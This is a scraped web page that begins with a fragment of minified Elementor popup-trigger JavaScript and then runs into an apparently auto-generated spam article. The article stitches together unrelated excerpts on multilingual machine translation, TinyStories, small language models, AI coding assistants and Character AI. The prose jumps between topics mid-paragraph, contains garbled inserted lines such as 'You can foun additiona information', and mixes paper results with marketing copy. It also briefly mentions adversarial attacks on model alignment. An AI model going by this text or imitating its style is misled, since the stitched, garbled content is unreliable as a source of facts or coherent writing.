TimesUtils{constructor(e){this.uniqueId=e.uniqueId,this.settings=e.settings,this.storage=e.storage}getTimeFramesInSecounds(e){return{day:86400,week:604800,month:2628288}[e]}setExpiration(e,t,n){if(this.storage.get(e))this.storage.set(e,t);else{const s={lifetimeInSeconds:this.getTimeFramesInSecounds(n)};this.storage.set(e,t,s)}}getImpressionsCount(){const e=this.storage.get(this.uniqueId)??0;return parseInt(e)}incrementImpressionsCount(){if(this.settings.period)if("session"!==this.settings.period){const e=this.getImpressionsCount();this.setExpiration(this.uniqueId,e+1,this.settings.period)}else sessionStorage.setItem(this.uniqueId,parseInt(sessionStorage.getItem(this.uniqueId)??0)+1);else this.storage.set("times",(this.storage.get("times")??0)+1)}shouldCountOnOpen(){this.settings.countOnOpen&&this.incrementImpressionsCount()}shouldDisplayPerTimeFrame(){return this.getImpressionsCount()1?arguments[1]:void 0;const t=parseInt(arguments.length>0&&void 0!==arguments[0]?arguments[0]:0){var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(3107)),r=s(n(6237));class _default extends o.default{constructor(){super(...arguments),this.uniqueId=`popup-${this.document.getSettings("id")}-impressions-count`;const{times_count:e,times_period:t,times_times:n}=this.getSettings();this.settings={countOnOpen:e,period:t,showsLimit:parseInt(n)},""===this.settings.period&&(this.settings.period=!1),["","close"].includes(this.settings.countOnOpen)?(this.settings.countOnOpen=!1,this.onPopupHide()):this.settings.countOnOpen=!0,this.utils=new r.default({uniqueId:this.uniqueId,settings:this.settings,storage:elementorFrontend.storage})}getName(){return"times"}check(){if(!this.settings.period){const e=this.document.getStorage("times")||0,t=this.getTimingSetting("times");return this.utils.shouldDisplayBackwordCompatible(e,t)}if("session"!==this.settings.period){if(!this.utils.shouldDisplayPerTimeFrame())return!1}else if(!this.utils.shouldDisplayPerSession())return!1;return!0}onPopupHide(){window.addEventListener("elementor/popup/hide",(()=>{this.utils.incrementImpressionsCount()}))}}t.default=_default},6470:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(3107));class _default extends o.default{getName(){return"url"}check(){const e=this.getTimingSetting("url"),t=this.getTimingSetting("action"),n=document.referrer;if("regex"!==t)return"hide"===t^-1!==n.indexOf(e);let s;try{s=new RegExp(e)}catch(e){return!1}return s.test(n)}}t.default=_default},2635:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(4622)),r=s(n(8729)),l=s(n(358)),i=s(n(62)),a=s(n(8811)),d=s(n(9758));class _default extends elementorModules.Module{constructor(e,t){super(e),this.document=t,this.triggers=[],this.triggerClasses={page_load:o.default,scrolling:r.default,scrolling_to:l.default,click:i.default,inactivity:a.default,exit_intent:d.default},this.runTriggers()}runTriggers(){const e=this.getSettings();jQuery.each(this.triggerClasses,((t,n)=>{if(!e[t])return;const s=new n(e,(()=>this.onTriggerFired()));s.run(),this.triggers.push(s)}))}destroyTriggers(){this.triggers.forEach((e=>e.destroy())),this.triggers=[]}onTriggerFired(){this.document.showModal(!0),this.destroyTriggers()}}t.default=_default},2162:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(e,t){super(e),this.callback=t}getTriggerSetting(e){return this.getSettings(this.getName()+"_"+e)}}t.default=_default},62:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{constructor(){super(...arguments),this.checkClick=this.checkClick.bind(this),this.clicksCount=0}getName(){return"click"}checkClick(){this.clicksCount++,this.clicksCount===this.getTriggerSetting("times")&&this.callback()}run(){elementorFrontend.elements.$body.on("click",this.checkClick)}destroy(){elementorFrontend.elements.$body.off("click",this.checkClick)}}t.default=_default},9758:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{constructor(){super(...arguments),this.detectExitIntent=this.detectExitIntent.bind(this)}getName(){return"exit_intent"}detectExitIntent(e){e.clientY<=0&&this.callback()}run(){elementorFrontend.elements.$window.on("mouseleave",this.detectExitIntent)}destroy(){elementorFrontend.elements.$window.off("mouseleave",this.detectExitIntent)}}t.default=_default},8811:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{constructor(){super(...arguments),this.restartTimer=this.restartTimer.bind(this)}getName(){return"inactivity"}run(){this.startTimer(),elementorFrontend.elements.$document.on("keypress mousemove",this.restartTimer)}startTimer(){this.timeOut=setTimeout(this.callback,1e3*this.getTriggerSetting("time"))}clearTimer(){clearTimeout(this.timeOut)}restartTimer(){this.clearTimer(),this.startTimer()}destroy(){this.clearTimer(),elementorFrontend.elements.$document.off("keypress mousemove",this.restartTimer)}}t.default=_default},4622:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{getName(){return"page_load"}run(){this.timeout=setTimeout(this.callback,1e3*this.getTriggerSetting("delay"))}destroy(){clearTimeout(this.timeout)}}t.default=_default},358:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{getName(){return"scrolling_to"}run(){let e;try{e=jQuery(this.getTriggerSetting("selector"))}catch(e){return}e.length&&(this.setUpIntersectionObserver(),this.observer.observe(e[0]))}setUpIntersectionObserver(){this.observer=new IntersectionObserver((e=>{e.forEach((e=>{e.isIntersecting&&this.callback()}))}))}destroy(){this.observer&&this.observer.disconnect()}}t.default=_default},8729:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{constructor(){super(...arguments),this.checkScroll=this.checkScroll.bind(this),this.lastScrollOffset=0}getName(){return"scrolling"}checkScroll(){const e=scrollY>this.lastScrollOffset?"down":"up",t=this.getTriggerSetting("direction");if(this.lastScrollOffset=scrollY,e!==t)return;if("up"===e)return void this.callback();const n=elementorFrontend.elements.$document.height()-innerHeight;scrollY/n*100>=this.getTriggerSetting("offset")&&this.callback()}run(){elementorFrontend.elements.$window.on("scroll",this.checkScroll)}destroy(){elementorFrontend.elements.$window.off("scroll",this.checkScroll)}}t.default=_default},3002:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),["classic","full_content","cards"].forEach((e=>{elementorFrontend.elementsHandler.attachHandler("posts",(()=>n.e(985).then(n.bind(n,2607))),e)})),elementorFrontend.elementsHandler.attachHandler("posts",(()=>n.e(287).then(n.bind(n,2298))),"classic"),elementorFrontend.elementsHandler.attachHandler("posts",(()=>n.e(287).then(n.bind(n,2298))),"full_content"),elementorFrontend.elementsHandler.attachHandler("posts",(()=>n.e(287).then(n.bind(n,8496))),"cards"),elementorFrontend.elementsHandler.attachHandler("portfolio",(()=>n.e(824).then(n.bind(n,5208))))}}t.default=_default},8650:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("share-buttons",(()=>n.e(58).then(n.bind(n,4112))))}}t.default=_default},6701:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("slides",(()=>n.e(114).then(n.bind(n,9378))))}}t.default=_default},102:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("facebook-button",(()=>n.e(443).then(n.bind(n,3225)))),elementorFrontend.elementsHandler.attachHandler("facebook-comments",(()=>n.e(443).then(n.bind(n,3225)))),elementorFrontend.elementsHandler.attachHandler("facebook-embed",(()=>n.e(443).then(n.bind(n,3225)))),elementorFrontend.elementsHandler.attachHandler("facebook-page",(()=>n.e(443).then(n.bind(n,3225))))}}t.default=_default},1748:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("table-of-contents",(()=>Promise.all([n.e(699),n.e(838)]).then(n.bind(n,8208))))}}t.default=_default},5438:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),["archive_classic","archive_full_content","archive_cards"].forEach((e=>{elementorFrontend.elementsHandler.attachHandler("archive-posts",(()=>n.e(685).then(n.bind(n,8297))),e)})),elementorFrontend.elementsHandler.attachHandler("archive-posts",(()=>n.e(685).then(n.bind(n,8537))),"archive_classic"),elementorFrontend.elementsHandler.attachHandler("archive-posts",(()=>n.e(685).then(n.bind(n,8537))),"archive_full_content"),elementorFrontend.elementsHandler.attachHandler("archive-posts",(()=>n.e(685).then(n.bind(n,9409))),"archive_cards"),jQuery((function(){var e=location.search.match(/theme_template_id=(\d*)/),t=e?jQuery(".elementor-"+e[1]):[];t.length&&jQuery("html, body").animate({scrollTop:t.offset().top-window.innerHeight/2})}))}}t.default=_default},2439:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("search-form",(()=>n.e(858).then(n.bind(n,6709))))}}t.default=_default},5032:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("woocommerce-menu-cart",(()=>n.e(102).then(n.bind(n,2083)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-purchase-summary",(()=>n.e(1).then(n.bind(n,484)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-checkout-page",(()=>n.e(124).then(n.bind(n,9035)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-cart",(()=>n.e(859).then(n.bind(n,7649)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-my-account",(()=>n.e(979).then(n.bind(n,1915)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-notices",(()=>n.e(497).then(n.bind(n,2627)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-product-add-to-cart",(()=>n.e(800).then(n.bind(n,5767)))),elementorFrontend.isEditMode()&&elementorFrontend.on("components:init",(()=>{elementorFrontend.elements.$body.find(".elementor-widget-woocommerce-cart").length||elementorFrontend.elements.$body.append('
')}))}}t.default=_default},8003:e=>{e.exports=wp.i18n}},e=>{e.O(0,[819],(()=>{return t=7996,e(e.s=t);var t}));e.O()}]); Scaling neural machine translation to 200 languages – Big Estruturas Metálicas
 

Scaling neural machine translation to 200 languages

Scaling neural machine translation to 200 languages

2305 07759 TinyStories: How Small Can Language Models Be and Still Speak Coherent English?

small language models

It measures the overlap between machine and human translations by combining the precision of 1-grams to 4-grams with a brevity penalty. Efforts such as sacrebleu67 have taken strides towards standardization, supporting the use of community-standard tokenizers under the hood. Reference 41 proposes spBLEU, a BLEU metric based on a standardized SentencePiece model (SPM) covering 101 languages, released alongside FLORES-101. In this work, we provide SPM-200 along with FLORES-200 to enable the measurement of spBLEU. Domain-specific modeling (DSM) is a software engineering methodology for designing and developing systems, most often IT systems such as computer software. It involves the systematic use of a graphical domain-specific language (DSL) to represent the various facets of a system.

A modeling language is any artificial language that can be used to express data, information or knowledge or systems in a structure that is defined by a consistent set of rules. The rules are used for interpretation of the meaning of components in the structure of a programming language. The high throughput of Fox-1 can largely be attributed to its architectural design, which incorporates Grouped Query Attention (GQA) for more efficient query processing. More specifically, by dividing query heads into groups that share a common key and value, Fox-1 significantly improves inference latency and enhances response times.

It provides an easy way to add code snippets without having to dig down into the weeds to add them manually. Its easy plug-and-play design is attractive for people who understand code but need more skills to implement it in core WordPress theme files without using a child theme. Some bright points include simple integration with VS Code and other popular IDEs and a great tool to learn how to code. However, some users state that their documentation could be improved, often requiring a visit to Discord for an answer.

small language models

Analyze the output generated by the model and compare it with your expectations or ground truth to assess its effectiveness accurately. Once you’ve identified the right model, the next step is to obtain the pre-trained version. However, it’s paramount to prioritize data privacy and integrity during the download process. Be sure to choose the version compatible with your chosen framework and library.

We also find that calibrated human evaluation scores correlate more strongly with automated scores than uncalibrated human evaluation scores across all automated metrics and choices of correlation coefficient. In particular, uncalibrated human evaluation scores have a Spearman’s R correlation coefficient of 0.625, 0.607 and 0.611 for spBLEU, chrF++ (corpus) and chrF++ (average sentence-level), respectively. A–d, The first (a) and last (b) encoder layers and then the first (c) and last (d) decoder layers. The similarity is measured with respect to the gating decisions (expert choice) per language (source side in the encoder and target side in the decoder).

Synthetic text generated by large models could offer an alternative way to assemble high-quality data sets that wouldn’t have to be so large. Eldan and Li used a two-step procedure for evaluating each of their small models after training. You can foun additiona information about ai customer service and artificial intelligence and NLP. First, they prompted the small model with the first half of a story distinct from those in the training data set so that it generated a new ending, repeating this process with 50 different test stories. Second, they instructed GPT-4 to grade each of the small model’s endings based on three categories — creativity, grammar and consistency with the beginning of the story. They then averaged the scores in each category, ending up with three final grades per model. The two researchers showed that language models thousands of times smaller than today’s state-of-the-art systems rapidly learned to tell consistent and grammatical stories when trained in this way.

Modeling language

Some common complaints are bugs on the iOS platform and the ability to keep your work private unless you sign up for one of the paid plans. Replit, an online coding platform, provides an interactive space for users to code, collaborate, and learn collectively. It’s known for its browser-based IDE that allows co-coding within documents and native hosting. Have you considered supercharging your coding experience with AI coding assistants? These powerful tools revolutionize productivity, enabling faster and more accurate code writing while freeing up time for creativity for the challenging solutions you are working on.

  • The code it produced was mostly free of errors, was of high quality, and was clean.
  • Initially, he wanted to train models to solve a certain class of math problems, but one afternoon, after spending time with his 5-year-old daughter, he realized that children’s stories were a perfect fit.
  • Eldan hoped the brevity and limited vocabulary of children’s stories might make learning more manageable for small models — making them both easier to train and easier to understand.
  • Enterprises using LLMs may risk exposing sensitive data through APIs, whereas SLMs, often not open source, present a lower risk of data leakage.
  • This does not put SLMs at a disadvantage and when used in appropriate use cases, they are more beneficial than LLMs.

There is also a concern about highly agglutinative languages in which BLEU fails to assign any credit to morphological variants. ChrF++ overcomes these weaknesses by basing the overlap calculation on character-level n-grams F-score (n ranging from 1 to 6) and complementing with word unigrams and bi-grams. In this work, we primarily evaluated using chrF++ using the settings from sacrebleu. However, when comparing with other published work, we used BLEU and spBLEU where appropriate. Our results directed us to focus on the second approach, which offers several advantages.

“In many ways, the models that we have today are going to be child’s play compared to the models coming in five years,” she said. Some people found the earlier Llama 2 model — released less than a year ago — to be “a little stiff and sanctimonious sometimes in not small language models responding to what were often perfectly innocuous or innocent prompts and questions,” he said. The Claude LLM focuses on constitutional AI, which shapes AI outputs guided by a set of principles that help the AI assistant it powers helpful, harmless and accurate.

Financial corporations also deploy SLMs for needs around analyzing earnings statements, asset valuations, risk modeling and more. Like we mentioned above, there are some tradeoffs to consider when opting for a small language model over a large one. The first is the probability of the label given the prompt, it is the most straightforward method, giving the probability of the continuation.

There are 3 billion and 7 billion parameter models available and 15 billion, 30 billion, 65 billion and 175 billion parameter models in progress at time of writing. First, because text requires fewer computational resources to synthesize than complex image data, their method can be used to rapidly generate synthetic training data. In one test, they generated 10,000 synthetic trajectories based on 10 real-world, visual trajectories.

How to Make a Church Website with WordPress (2024 Tutorial)

You’ll get white-glove onboarding, integration with Git, and access control and security features. Unlike the others, its parameter count has not been released to the public, though there are rumors that the model has more than 170 trillion. OpenAI describes GPT-4 as a multimodal model, meaning it can process and generate both language and images as opposed to being limited to only language. GPT-4 also introduced a system message, which lets users specify tone of voice and task. They also want to develop a navigation-oriented captioner that could boost the method’s performance.

When the source is conditioned on only the source language, the encoder generalizes better to pairs of source and target languages not encountered during training1. Once we had identified the best sentence encoder for each language using the xsim scores, we performed mining, added the mined data to the existing bitexts and trained a bilingual NMT system. Initial experiments indicated that a threshold on the margin of 1.06 seems to be the best compromise between precision and recall for most languages. For these NMT baselines, we do not apply extra filtering on the bitexts and leave this to the training procedure of our massively multilingual NMT system.

In artificial intelligence, Large Language Models (LLMs) and Small Language Models (SLMs) represent two distinct approaches, each tailored to specific needs and constraints. While LLMs, exemplified by GPT-4 and similar giants, showcase the height of language processing with vast parameters, SLMs operate on a more modest scale, offering practical solutions for resource-limited environments. Although authors of LLMs have compared their different model sizes(Kaplan et al., 2020; Hoffmann et al., 2022), this study widens this analysis by directly comparing different architectures on an extensive set of datasets.

The integration of Fox-1 into both TensorOpera AI Platform and TensorOpera FedML Platform further enhances its versatility, enabling its deployment and training across both cloud and edge computing environments. This approach offers cost efficiency, enhanced privacy, and personalized user experiences, all within a unified ecosystem that facilitates seamless collaboration between cloud and edge environments. https://chat.openai.com/ One of the most significant advantages of SLMs is their operational efficiency. Their streamlined design leads to lower computational demands, making them suitable for environments with limited hardware capabilities or lower cloud resource allocations. Eldan and Li hope that the research will motivate other researchers to train different models on the TinyStories data set and compare their capabilities.

Its small size is ideal for running locally, which could bring an AI model of similar capability to the free version of ChatGPT to a smartphone without needing an Internet connection to run it. Once the language model has completed its run, evaluating its performance is crucial. Calculate relevant metrics such as accuracy, perplexity, or F1 score, depending on the nature of your task.

small language models

These techniques often combine preference-based optimization techniques like Direct Preference Optimisation (DPO) and Reinforcement Learning with Human Feedback (RLHF) with supervised fine-tuning (SFT). By modifying the models to avoid interacting with hazardous inputs, these strategies seek to reduce the likelihood of producing damaging material. But she said the “question on the table” is whether researchers have been able to fine tune its bigger Llama 3 model so that it’s safe to use and doesn’t, for example, hallucinate or engage in hate speech. In contrast to leading proprietary systems from Google and OpenAI, Meta has so far advocated for a more open approach, publicly releasing key components of its AI systems for others to use. Getting to AI systems that can perform higher-level cognitive tasks and commonsense reasoning — where humans still excel— might require a shift beyond building ever-bigger models. Llama uses a transformer architecture and was trained on a variety of public data sources, including webpages from CommonCrawl, GitHub, Wikipedia and Project Gutenberg.

We limit this evaluation to simple prompting methods and hand-crafted, unoptimized prompts. Table 8 reports the ANCOVA results of the impact of different scoring functions on performances for the two architectures. On the other hand, datasets such as cdr, ethos, and financial_phrasebank remain unaffected by the architectural choice.

Additionally, AI code assistants elevate code quality, offering expert guidance to write efficient, maintainable, and secure code. And they are one of the best learning tools for exploring languages you need to become more familiar with. ChatGPT, which runs on a set of language models from OpenAI, attracted more than 100 million users just two months after its release in 2022.

Their results hint at new research directions that might be helpful for training larger models and understanding their behavior. Up to this point we have covered the general capabilities of small language models and how they confer advantages in efficiency, customization, and oversight compared to massive generalized LLMs. However, SLMs also shine for honing in on specialized use cases by training on niche datasets.

Mistral also has a fine-tuned model that is specialized to follow instructions. Its smaller size enables self-hosting and competent performance for business purposes. Lamda (Language Model for Dialogue Applications) is a family of LLMs developed by Google Brain announced in 2021.

The Rise of Small Language Models – The New Stack

The Rise of Small Language Models.

Posted: Fri, 16 Feb 2024 08:00:00 GMT [source]

The performance of LLM models varies based on multiple factors, including model size, architectural choices, and fine-tuning strategies. While larger model sizes do not consistently lead to improved performance across all datasets, the architectural choice significantly influences outcomes on specific datasets. The impact of instruction fine-tuning is also evident, but its efficacy is dependent on the architecture. Notably, the choice of scoring function doesn’t seem to make a marked difference in performance. We compare the performance of the LLM models on several datasets, studying the correlation with the number of parameters, the impact of the architecture, and the type of training strategy (instruction or not).

It’s a valuable resource for developers aiming to be more efficient, accurate, and secure in their coding endeavors. A massively multilingual translation (MMT) model uses the same shared model capacity to train on several translation directions simultaneously. While doing so can lead to beneficial cross-lingual transfer between related languages, it can also add to the risk of interference between unrelated languages1,61. MoE models are a type of conditional computational models62,63 that activate a subset of model parameters per input, as opposed to dense models that activate all model parameters per input. MoE models unlock marked representational capacity while maintaining the same inference and training efficiencies in terms of FLOPs compared with the core dense architecture. In this section, we first describe the multilingual machine translation task setup, which includes tokenization and base model architecture.

It’s compatible with numerous programming languages like Python, Java, JavaScript, PHP, Go, and Rust, making it one of our list’s most robust AI coding assistants. Tabnine helps increase productivity and improves code quality by offering smart completion suggestions and identifying potential errors. It’s an essential tool for developers looking to save time, enhance code quality, and lessen costs.

Mistral

Last paragraph stated that knowledge of the stakeholders should be presented in a good way. In addition it is imperative that the language should be able to express all possible explicit knowledge of the stakeholders. Enterprises using LLMs may risk exposing sensitive data through APIs, whereas SLMs, often not open source, present a lower risk of data leakage.

Tiny but mighty: The Phi-3 small language models with big potential – Microsoft

Tiny but mighty: The Phi-3 small language models with big potential.

Posted: Tue, 23 Apr 2024 07:00:00 GMT [source]

AI for predictive analytics refers to the integration of artificial intelligence technologies into the field of predictive analytics, a domain that traditionally relies on statistical models and data analysis techniques. At LeewayHertz, we understand the transformative potential of Small Language Models (SLMs). These models offer businesses a unique opportunity to unlock deeper insights, streamline workflows, and achieve a competitive edge.

Plus, you can take Character AI wherever you go, thanks to the new Android and iOS apps. The research has shown through systematic trials that the initial tokens of the outputs of aligned and unaligned models show the main variation in safety behaviors. The effectiveness of some attack techniques, which center on starting destructive trajectories, can be explained by this shallow alignment. For instance, the original tokens of a destructive reaction are frequently drastically changed by adversarial suffix attacks and fine-tuning attacks. Artificial Intelligence (AI) alignment strategies are critical in ensuring the safety of Large Language Models (LLMs).

LLMs such as GPT-4 are transforming enterprises with their ability to automate complex tasks like customer service, delivering rapid and human-like responses that enhance user experiences. However, their broad training on diverse datasets from the internet can result in a lack of customization for specific enterprise needs. This generality may lead to gaps in handling industry-specific terminology and nuances, potentially decreasing the effectiveness of their responses. Small Language Models achieve a unique equilibrium with their reduced parameter count, typically in the tens to hundreds of millions, as opposed to larger models which may possess billions of parameters.

The difference in results between the two architectures suggests that the impact of instruction-tuning might be architecture-dependent. Both the graphical analysis and the ANCOVA show an effect of instruction-tuning on encoder-decoder architecture. For the causal architecture, there is no significant impact of instruction-tuning on Acc/F1 scores. The p-value for the decoder-only architecture is 0.6693, much greater than 0.05.

That evidence comes from a pair of follow-up papers about billion-parameter models by Eldan, Li and other Microsoft researchers. In the first paper, they trained a model to learn the programming language Python using snippets of code generated by GPT-3.5 along with carefully curated code from the internet. In the second, they augmented the training data set with synthetic “textbooks,” covering a wide range of topics, to train a general-purpose language model. In their tests, both models compared favorably to larger models trained on larger data sets. But evaluating language models is always tricky, and the synthetic training data approach is still in its infancy — more independent tests are necessary.

With this procedure in hand, Eldan and Li were finally ready to compare different models and find out which were the star students. When playing with the system now, I’m not getting nearly the quality of responses that your paper is showing.. The Splunk platform removes the barriers between data and action, empowering observability, IT and security teams to ensure their organizations are secure, resilient and innovative.

In a discussion at MIT, Altman shared insights suggesting that the reduction in model parameters could be key to achieving superior results. Well-known LLMs include proprietary models like OpenAI’s GPT-4, as well as a growing roster of open source contenders like Meta’s LLaMA. Column Model contains the name of each model on their HuggingFace repository, column Number of Parameters and Instruction-Tuned are quite explicit. We focused on causal-decoder-only and encoder-decoder models without comparing them with encoder-only or non-causal decoders as recently released models focused on those architectures.

These methods make SLMs not only more relevant and accurate but also ensure they are specifically aligned with enterprise objectives. They can perform sentiment analysis to gauge public opinion and customer feedback, identify named entities for better information organization, and analyze market trends to optimize sales and marketing strategies. These capabilities help businesses make well-informed decisions, customize customer interactions, and drive innovation in product development.

Therefore, such language offers a distinct vocabulary, syntax, and notation for each stage, such as discovery, analysis, design, architecture, contraction, etc. For example, for the analysis phase of a project, the modeler employs specific analysis notation to deliver an analysis proposition diagram. During the design phase, however, logical design notation is used to depict the relationship between software entities. In addition, the discipline-specific modeling language best practices does not preclude practitioners from combining the various notations in a single diagram. In essence, an SLM is a neural network designed to produce natural language text. The descriptor “small” applies not only to the physical dimensions of the model but also to its parameter count, neural structure, and the data volume used during training.

As suggested by (Holtzman et al., 2022), many valid sequences can represent the same concept, called surface form competition. For example, “+”, “positive”, “More positive than the opposite” could be used to represent the same concept of positivity for the sentiment analysis task. As this competition exists, how verbalizers are designed could either mitigate or exacerbate the effects of surface form competition, thereby influencing the overall effectiveness of the prompt-based classification approach. Zhao et al. (2023) uses k-Nearest-Neighbor for verbalizer construction and augments their verbalizers based on embeddings similarity. For the fine-tuning process, we use about 10,000 question-and-answer pairs generated from the Version 1’s internal documentation.

TensorOpera, Inc. (formerly FedML, Inc.) is an innovative AI company based in Silicon Valley, specifically Palo Alto, California. TensorOpera specializes in developing scalable and secure AI platforms, offering two flagship products tailored for enterprises and developers. The TensorOpera® AI Platform, available at TensorOpera.ai, is a comprehensive generative AI platform for model deployment and serving, model training and fine-tuning, AI agent creation, and more. It supports launching training and inference jobs on a serverless/decentralized GPU cloud, experimental tracking for distributed training, and enhanced security and privacy measures.

Recent analysis has found that self-supervised learning appears particularly effective for imparting strong capabilities in small language models — more so than for larger models. By presenting language modelling as an interactive prediction challenge, self-supervised learning forces small models to deeply generalize from each data example shown rather than simply memorizing statistics passively. How did Microsoft cram a capability potentially similar to GPT-3.5, which has at least 175 billion parameters, into such a small model? Its researchers found the answer by using carefully curated, high-quality training data they initially pulled from textbooks. “The innovation lies entirely in our dataset for training, a scaled-up version of the one used for phi-2, composed of heavily filtered web data and synthetic data,” writes Microsoft. Unlike LLMs trained on massive, general datasets, SLMs can be fine-tuned to excel in specific domains, like finance, healthcare, or customer service.

Often software modeling tools are used to construct these models, which may then be capable of automatic translation to code. TensorOpera, the company providing `Your Generative AI Platform at Scale’, is excited to announce the launch of TensorOpera Fox-1. This 1.6-billion parameter small language model (SLM) is designed to advance scalability and ownership in the generative AI landscape. Fox-1 stands out by delivering top-tier performance, surpassing comparable SLMs developed by industry giants such as Apple, Google, and Alibaba. Parameters are numeric values that direct a model’s interpretation of inputs and the generation of outputs. A model with fewer parameters is inherently simpler, necessitating less training data and consuming fewer computational resources.

This platform offers an integrated environment for hosting datasets, orchestrating model training pipelines, and efficiently deploying models through APIs or applications. Notably, the Clara Train module specializes in crafting compact yet proficient SLMs through state-of-the-art self-supervised learning techniques. While working on projects, it’s important to remember several key considerations to overcome potential issues. Saving checkpoints during training ensures continuity and facilitates model recovery in case of interruptions. Optimizing your code and data pipelines maximizes efficiency, especially when operating on a local CPU where resources may be limited. Additionally, leveraging GPU acceleration or cloud-based resources can address scalability concerns in the future, ensuring your model can handle increasing demands effectively.

Additionally, it provides a user-friendly interface and interactive data dashboards, so even newcomers can navigate it easily. So, those looking for the best AI coding assistants for SQL query generation will find SQLAI the perfect solution. Codiga supports 12 programming languages, including C, C++, Java, JavaScript, TypeScript, PHP, and more.

On the contrary, executable modeling languages are intended to amplify the productivity of skilled programmers, so that they can address more challenging problems, such as parallel computing and distributed systems. Fox-1 was trained from scratch with a 3-stage data curriculum on 3 trillion tokens of text and code data in 8K sequence length. In various benchmarks, such as MMLU, ARC Challenge, TruthfulQA, and GSM8k, Fox-1 performs better or on par with other SLMs in its class including Gemma-2B, Qwen1.5-1.8B, and OpenELM-1.1B. Customization of SLMs requires data science expertise, with techniques such as LLM fine-tuning and Retrieval Augmented Generation (RAG) to enhance model performance.

To use Studio Bot for AI code completion, it must be able to access context from your codebase. Therefore, it requires you to download Android Studio Iguana and install it onto your local machine. Sourcegraph Cody is your AI-powered assistant for coding that accelerates your workflow and enriches your understanding of whole code bases. The main product of Sourcegraph is a code base assistant that helps you search across the board to discover where code lives and who’s updated it—and it does this across entire repos, branches, and code hosts. Cody integrates into popular IDEs, such as VS Code, JetBrains, and Neovim, and allows users to complete code as they type.

Proxy metric for new encoders

But large models trained on massive data sets learn countless irrelevant details along with the rules that really matter. Eldan hoped the brevity and limited vocabulary of children’s stories might make learning more manageable for small models — making them both easier to train and easier to understand. Ronen Eldan, a mathematician Chat GPT who joined Microsoft Research in 2022 to study generative language models, wanted to develop a cheaper and faster way to explore their abilities. The natural way to do that was by using a small data set, and that in turn meant he’d have to train models to specialize in a specific task, so they wouldn’t spread themselves too thin.

Our experts work with you through close collaboration to craft a tailored strategy for Small Language Model (SLM) development that seamlessly aligns with your business objectives. Beyond simply constructing models, we focus on delivering solutions that yield measurable outcomes. Continuous research efforts are dedicated to narrowing the efficiency gap between small and large models, aiming for enhanced capabilities. Moreover, the foreseeable future anticipates cross-sector adoption of these agile models as various industries recognize their potential.

This involves installing the necessary libraries and dependencies, particularly focusing on Python-based ones such as TensorFlow or PyTorch. These libraries provide pre-built tools for machine learning and deep learning tasks, and you can easily install them using popular package managers like pip or conda. Understanding the differences between Large Language Models (LLMs) and Small Language Models (SLMs) is crucial for selecting the most suitable model for various applications. While LLMs offer advanced capabilities and excel in complex tasks, SLMs provide a more efficient and accessible solution, particularly for resource-limited environments. Both models contribute to the diverse landscape of AI applications, each with strengths and potential impact.

small language models

However, the question remains whether massively multilingual models can enable the representation of hundreds of languages without compromising quality. Our results demonstrate that doubling the number of supported languages in machine translation and maintaining output quality are not mutually exclusive endeavours. Our final model—which includes 200 languages and three times as many low-resource languages as high-resource ones—performs, as a mean, 44% better than the previous state-of-the-art systems. This paper presents some of the most important data-gathering, modelling and evaluation techniques used to achieve this goal.

One of the unique features of Character AI is the ability to interact with a wide range of characters., including historical figures (both living and deceased), as well as user-generated chatbots with distinct personalities. Its deep machine-learning process allows users to experience authentic conversations where it’s difficult to tell your chatting with a computer. Whether you want to chat with a Pokemon, George Washington, or Elon Musk, Character AI provides an interesting perspective that other chatbots can’t.

Those seeking more features can opt for the premium plan that offers all the features of the free plan, plus dependency management, detection of leaked SSH or API keys, and premium support for $14 per month. Unlike other AI chatbots, such as ChatGPT, Character AI’s output is more human-like and allows you to chat with more than one bot at a time, offering different perspectives. Developed by former Google AI developers Noam Shazeer and Daniel De Freitas, Character AI was released in beta form in September 2022. Since its launch, it has become one of the most popular AI chatbots behind ChatGPT. StableLM is a series of open source language models developed by Stability AI, the company behind image generator Stable Diffusion.

